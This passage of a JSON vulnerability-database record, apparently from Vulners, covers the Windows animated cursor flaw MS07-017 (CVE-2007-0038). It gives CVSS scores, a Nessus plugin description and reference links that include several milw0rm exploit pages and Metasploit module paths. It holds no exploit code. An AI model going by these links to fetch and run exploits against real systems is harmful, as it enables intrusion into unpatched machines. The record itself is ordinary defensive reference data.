http://archives.neohapsis.com/archives/bugtraq/2007-04/0013.html\nGeneric Exploit URL: http://whitestar.linuxbox.org/pipermail/exploits/2007-March/000167.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3636\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3635\nGeneric Exploit URL: http://asert.arbornetworks.com/2007/04/never-slow-down-ms07-017-ani-exploit\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3634\nGeneric Exploit URL: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb\nFrSIRT Advisory: ADV-2007-1151\n[CVE-2007-0038](https://vulners.com/cve/CVE-2007-0038)\n[CVE-2007-1765](https://vulners.com/cve/CVE-2007-1765)\nCERT VU: 191609\nBugtraq ID: 23194\n", "published": "2007-03-29T18:34:47", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:33629", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "lastseen": "2017-04-28T13:20:29"}], "nessus": [{"id": "SMB_NT_MS07-017.NASL", "type": "nessus", "title": "MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902)", "description": "The remote host is running a version of Windows with a bug in the Animated Cursor (ANI) handling routine that could allow an attacker to execute arbitrary code on the remote host by sending a specially crafted email or by luring a user on the remote host into visiting a rogue web site.\n\nAdditionally, the system is vulnerable to :\n\n - Local Privilege Elevation (GDI, EMF, Font Rasterizer)\n\n - Denial of Service (WMF)", "published": "2007-04-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=24911", "cvelist": ["CVE-2007-1211", "CVE-2007-1213", "CVE-2006-5586", 
"CVE-2007-1212", "CVE-2007-1215", "CVE-2007-0038", "CVE-2006-5758", "CVE-2007-1765"], "lastseen": "2017-10-29T13:37:10"}]}}